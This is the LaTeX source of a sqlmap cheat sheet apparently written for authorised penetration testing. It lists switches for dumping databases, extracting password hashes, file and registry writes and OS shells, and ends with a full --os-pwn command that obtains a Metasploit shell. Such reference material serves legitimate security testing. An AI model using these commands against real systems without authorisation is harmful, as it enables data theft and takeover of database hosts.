\documentclass[10pt,a4paper]{article}

% Packages
\usepackage{fancyhdr}           % For header and footer
\usepackage{multicol}           % Allows multicols in tables
\usepackage{tabularx}           % Intelligent column widths
\usepackage{tabulary}           % Used in header and footer
\usepackage{hhline}             % Border under tables
\usepackage{graphicx}           % For images
\usepackage{xcolor}             % For hex colours
%\usepackage[utf8x]{inputenc}   % For unicode character support
\usepackage[T1]{fontenc}        % Without this we get weird character replacements
\usepackage{colortbl}           % For coloured tables
\usepackage{setspace}           % For line height
\usepackage{lastpage}           % Needed for total page number
\usepackage{seqsplit}           % Splits long words.
%\usepackage{opensans}          % Can't make this work so far. Shame. Would be lovely.
\usepackage[normalem]{ulem}     % For underlining links
% Most of the following are not required for the majority
% of cheat sheets but are needed for some symbol support.
\usepackage{amsmath}            % Symbols
\usepackage{MnSymbol}           % Symbols
\usepackage{wasysym}            % Symbols
%\usepackage[english,german,french,spanish,italian]{babel} % Languages

% Document Info
\author{binca}
\pdfinfo{
  /Title (sqlmap.pdf)
  /Creator (Cheatography)
  /Author (binca)
  /Subject (sqlmap Cheat Sheet)
}

% Lengths and widths
\addtolength{\textwidth}{6cm}
\addtolength{\textheight}{-1cm}
\addtolength{\hoffset}{-3cm}
\addtolength{\voffset}{-2cm}
\setlength{\tabcolsep}{0.2cm} % Space between columns
\setlength{\headsep}{-12pt} % Reduce space between header and content
\setlength{\headheight}{85pt} % If less, LaTeX automatically increases it
\renewcommand{\footrulewidth}{0pt} % Remove footer line
\renewcommand{\headrulewidth}{0pt} % Remove header line
\renewcommand{\seqinsert}{\ifmmode\allowbreak\else\-\fi} % Hyphens in seqsplit

% These two commands together give roughly
% the right line height in the tables
\renewcommand{\arraystretch}{1.3}
\onehalfspacing

% Commands
\newcommand{\SetRowColor}[1]{\noalign{\gdef\RowColorName{#1}}\rowcolor{\RowColorName}} % Shortcut for row colour
\newcommand{\mymulticolumn}[3]{\multicolumn{#1}{>{\columncolor{\RowColorName}}#2}{#3}} % For coloured multi-cols
\newcolumntype{x}[1]{>{\raggedright}p{#1}} % New column types for ragged-right paragraph columns
\newcommand{\tn}{\tabularnewline} % Required as custom column type in use

% Font and Colours
\definecolor{HeadBackground}{HTML}{333333}
\definecolor{FootBackground}{HTML}{666666}
\definecolor{TextColor}{HTML}{333333}
\definecolor{DarkBackground}{HTML}{918027}
\definecolor{LightBackground}{HTML}{F8F7F1}
\renewcommand{\familydefault}{\sfdefault}
\color{TextColor}

% Header and Footer
\pagestyle{fancy}
\fancyhead{} % Set header to blank
\fancyfoot{} % Set footer to blank
\fancyhead[L]{
\noindent
\begin{multicols}{3}
\begin{tabulary}{5.8cm}{C}
    \SetRowColor{DarkBackground}
    \vspace{-7pt}
    {\parbox{\dimexpr\textwidth-2\fboxsep\relax}{\noindent
        \hspace*{-6pt}\includegraphics[width=5.8cm]{/web/www.cheatography.com/public/images/cheatography_logo.pdf}}
    }
\end{tabulary}
\columnbreak
\begin{tabulary}{11cm}{L}
    \vspace{-2pt}\large{\bf{\textcolor{DarkBackground}{\textrm{sqlmap Cheat Sheet}}}} \\
    \normalsize{by \textcolor{DarkBackground}{binca} via \textcolor{DarkBackground}{\uline{cheatography.com/44948/cs/13352/}}}
\end{tabulary}
\end{multicols}}

\fancyfoot[L]{ \footnotesize
\noindent
\begin{multicols}{3}
\begin{tabulary}{5.8cm}{LL}
  \SetRowColor{FootBackground}
  \mymulticolumn{2}{p{5.377cm}}{\bf\textcolor{white}{Cheatographer}}  \\
  \vspace{-2pt}binca \\
  \uline{cheatography.com/binca} \\
\end{tabulary}
\vfill
\columnbreak
\begin{tabulary}{5.8cm}{L}
  \SetRowColor{FootBackground}
  \mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Cheat Sheet}}  \\
  \vspace{-2pt}Not Yet Published.\\
  Updated 9th November, 2017.\\
  Page {\thepage} of \pageref{LastPage}.
\end{tabulary}
\vfill
\columnbreak
\begin{tabulary}{5.8cm}{L}
  \SetRowColor{FootBackground}
  \mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Sponsor}}  \\
  \SetRowColor{white}
  \vspace{-5pt}
  %\includegraphics[width=48px,height=48px]{dave.jpeg}
  Measure your website readability!\\
  www.readability-score.com
\end{tabulary}
\end{multicols}}

\begin{document}
\raggedright
\raggedcolumns

% Set font size to small. Switch to any value
% from this page to resize cheat sheet text:
% www.emerson.emory.edu/services/latex/latex_169.html
\footnotesize % Small font.

\begin{multicols*}{2}

\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{Other SQLi Tools}}  \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Numerous tools are available to assist in the discovery of SQLi flaws.}  \tn
% Row Count 2 (+ 2)
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{Few tools go beyond data exfiltration, and many are no longer actively maintained -- check a tool's last release date before relying on it in an engagement.}  \tn
% Row Count 4 (+ 2)
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{NOT BEING UPDATED: \{\{nl\}\} {\bf{BBQSQL}} is a Python framework to ease and speed up the exploitation of blind SQLi flaws. It supports two blind SQLi search strategies: \{\{nl\}\} {\bf{Binary Search}}: Typical technique that halves the candidate character set on every request \{\{nl\}\} {\bf{Frequency Search}}: Guesses characters in order of their frequency of occurrence in English-language text, so natural-language data is usually recovered in fewer requests.
\{\{nl\}\} Attacks can be coupled with different indicators including timing, HTTP headers, content, response size, HTTP status codes, and others.}  \tn
% Row Count 14 (+ 10)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{About}}  \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Open source, Python-based, command-line SQLi tool}  \tn
% Row Count 1 (+ 1)
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{Performs {\bf{In-band/Inline and Blind}} SQLi discovery and exploitation.}  \tn
% Row Count 3 (+ 2)
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Supports many RDBMS including {\bf{MySQL, MSSQL, Oracle, PostgreSQL, SQLite}}}  \tn
% Row Count 5 (+ 2)
% Row 3
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{Integrates with {\bf{Metasploit, Burp, w3af, and ZAP}}}  \tn
% Row Count 7 (+ 2)
% Row 4
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Exploit techniques include time-based blind, error-based, boolean-based blind, stacked queries, UNION-based and more}  \tn
% Row Count 9 (+ 2)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{x{2 cm} x{6 cm} }
\SetRowColor{DarkBackground}
\mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Help}}  \tn
% Row 0
\SetRowColor{LightBackground}
{\bf{-h}} & Basic help: the most commonly used options \tn
% Row Count 1 (+ 1)
% Row 1
\SetRowColor{white}
{\bf{-hh}} & Advanced help: every option, including the file-system, OS and registry takeover switches listed further down \tn
% Row Count 2 (+ 1)
\hhline{>{\arrayrulecolor{DarkBackground}}--}
\SetRowColor{LightBackground}
\mymulticolumn{2}{x{8.4cm}}{There is also a user guide.
Sqlmap has many command-line switches to help with discovery and exploitation; the ones below are a small subset.}  \tn
\hhline{>{\arrayrulecolor{DarkBackground}}--}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{x{1.76 cm} x{6.24 cm} }
\SetRowColor{DarkBackground}
\mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Initial Targeting}}  \tn
% Row 0
\SetRowColor{LightBackground}
{\bf{-u}} & Target URL (include the parameter(s) to test in the query string) to kick off sqlmap \tn
% Row Count 1 (+ 1)
% Row 1
\SetRowColor{white}
{\bf{-{}-crawl}} & Spiders the site to discover entry points. Noisy, and it follows every link it finds, so make sure everything it can reach is inside the authorised scope. \tn
% Row Count 3 (+ 2)
% Row 2
\SetRowColor{LightBackground}
{\bf{-{}-forms}} & Parses HTML forms on the target page and tests their fields for injection \tn
% Row Count 5 (+ 2)
% Row 3
\SetRowColor{white}
{\bf{-{}-dbms}} & Tells sqlmap the back-end DBMS if already known; skips fingerprinting and avoids sending payloads meant for other engines \tn
% Row Count 7 (+ 2)
\hhline{>{\arrayrulecolor{DarkBackground}}--}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{x{2.96 cm} x{5.04 cm} }
\SetRowColor{DarkBackground}
\mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Authorization, Sessions, and Proxies}}  \tn
% Row 0
\SetRowColor{LightBackground}
{\bf{-r / -l }} & Load a captured HTTP request file (-r) or a proxy log (-l) as the starting point. The captured cookies and headers carry the authenticated session, which bridges the authentication gap. \tn
% Row Count 4 (+ 4)
% Row 1
\SetRowColor{white}
{\bf{-{}-cookie}}\{\{nobreak\}\} & Manually sets the Cookie header (e.g. a session cookie copied from your browser) \tn
% Row Count 6 (+ 2)
% Row 2
\SetRowColor{LightBackground}
{\bf{ -{}-proxy}} & Routes sqlmap's traffic through Burp, ZAP, or another proxy so every request is logged and can be inspected or replayed \tn
% Row Count 8 (+ 2)
\hhline{>{\arrayrulecolor{DarkBackground}}--}
\SetRowColor{LightBackground}
\mymulticolumn{2}{x{8.4cm}}{If you have already authenticated or interacted with the target, the above switches can be useful. \newline There are some nuances to using sqlmap with proxies because it does not automatically inherit an authenticated session active in your proxy; the proxy has to be configured to apply that session to sqlmap's requests. \newline In ZAP, toggle "Enable Session Tracking". \newline In Burp, update the Session handling rules under Options\textgreater{}Sessions. The default cookie-jar rule is scoped to the browser-facing tools and the Scanner only, so extend its tool scope or sqlmap's proxied requests will not receive the session cookies.
\newline Note: There may be a performance impact, since every request now passes through the proxy's session-handling logic.}  \tn
\hhline{>{\arrayrulecolor{DarkBackground}}--}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{x{2.96 cm} x{5.04 cm} }
\SetRowColor{DarkBackground}
\mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{DB Data Exfil}}  \tn
% Row 0
\SetRowColor{LightBackground}
{\bf{-{}-all}} & Retrieve everything: all enumeration (banner, users, privileges, databases, tables, columns) plus a dump of all data. Very noisy and slow, and rarely appropriate against a production data store. \tn
% Row Count 1 (+ 1)
% Row 1
\SetRowColor{white}
{\bf{-{}-count}}\{\{nobreak\}\} & No data exfiltrated, simply provides a count of records per table. Preferred way to demonstrate impact on sensitive data stores (PII, card data) without actually pulling the records. \tn
% Row Count 5 (+ 4)
% Row 2
\SetRowColor{LightBackground}
{\bf{-{}-dump}} & Dumps table entries given the applied constraints. Restrict it with -D/-T/-C, and agree beforehand how dumped records are stored, reported and destroyed. \{\{nl\}\} Example: {\bf{-D Orders -T Customers -{}-dump}} \tn
% Row Count 9 (+ 4)
% Row 3
\SetRowColor{white}
{\bf{-{}-search}}\{\{nobreak\}\} & Search database, table or column names for a string (e.g. "pass", "card") to locate the interesting data before dumping anything \tn
% Row Count 11 (+ 2)
\hhline{>{\arrayrulecolor{DarkBackground}}--}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{x{4.32 cm} x{3.68 cm} }
\SetRowColor{DarkBackground}
\mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Beyond Data Exfiltration}}  \tn
% Row 0
\SetRowColor{LightBackground}
{\bf{-{}-users}} & Enumerate DB user accounts \tn
% Row Count 2 (+ 2)
% Row 1
\SetRowColor{white}
{\bf{-{}-passwords}}\{\{nobreak\}\} & Enumerate DB users' password hashes (sqlmap offers an offline dictionary attack against them) \tn
% Row Count 4 (+ 2)
% Row 2
\SetRowColor{LightBackground}
{\bf{-{}-file-read}} & Download files from the DB host to the attack system; requires file-read privileges for the DB account \tn
% Row Count 6 (+ 2)
% Row 3
\SetRowColor{white}
{\bf{-{}-file-write}} & Upload files to the DB host. This modifies the target -- confirm it is within the rules of engagement and record what was written so it can be cleaned up \tn
% Row Count 8 (+ 2)
% Row 4
\SetRowColor{LightBackground}
{\bf{-{}-reg-read/-{}-reg-write}}\{\{nobreak\}\} & Read/Write Windows registry keys (Windows DB hosts only) \tn
% Row Count 10 (+ 2)
% Row 5
\SetRowColor{white}
{\bf{-{}-reg-add/-{}-reg-del}}\{\{nobreak\}\} & Add/Delete Windows registry keys; destructive, so note the original value before changing it \tn
% Row Count 12 (+ 2)
\hhline{>{\arrayrulecolor{DarkBackground}}--}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} }
\SetRowColor{DarkBackground}
\mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Post Exploitation}}  \tn
% Row 0
\SetRowColor{LightBackground}
{\bf{-{}-priv-esc}}\{\{nobreak\}\} & Escalate the privileges of the database process user on the host (used together with -{}-os-pwn; relies on Metasploit) \tn
% Row Count 2 (+ 2)
% Row 1
\SetRowColor{white}
{\bf{-{}-sql-query / -{}-sql-shell}}\{\{nobreak\}\} & Run a single SQL statement or get a simulated interactive SQL shell \tn
% Row Count 5 (+ 3)
% Row 2
\SetRowColor{LightBackground}
{\bf{-{}-os-cmd / -{}-os-shell}}\{\{nobreak\}\} & Execute a single OS command or get a simulated interactive OS shell on the DB host \tn
% Row Count 9 (+ 4)
% Row 3
\SetRowColor{white}
{\bf{-{}-os-pwn}} & Out-of-band Metasploit \seqsplit{shell/VNC/Meterpreter}; the DB host must be able to reach your listener (or accept a connection from it), so egress filtering usually blocks this from the Internet \tn
% Row Count 13 (+ 4)
\hhline{>{\arrayrulecolor{DarkBackground}}--}
\SetRowColor{LightBackground}
\mymulticolumn{2}{x{8.4cm}}{Note: OS takeover typically needs stacked queries and a highly privileged DB account; otherwise sqlmap falls back to writing a web stager/backdoor, which requires a web root that the database account can write to and that is reachable over HTTP. Most effective after pivoting or during an internal engagement. Every OS command is a change on the target -- log it for the report and the clean-up.}  \tn
\hhline{>{\arrayrulecolor{DarkBackground}}--}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{MSF Shell with sqlmap}}  \tn
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{\$ cd \seqsplit{/opt/metasploit-framework} \newline \$ sqlmap -u \seqsplit{"domain/sqli/?id=1\&submit=submit"} -{}-cookie="Cookie Value" -{}-proxy http://localhost:8080 -{}-user-agent 88 -{}-os-pwn -{}-msf-path /opt/metasploit-framework \newline -{}-user-agent takes an arbitrary User-Agent string; a distinctive value makes your test traffic easy to attribute in the target's logs. -{}-msf-path (two dashes) must point at the local Metasploit install.}  \tn
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

% That's all folks
\end{multicols*}

\end{document}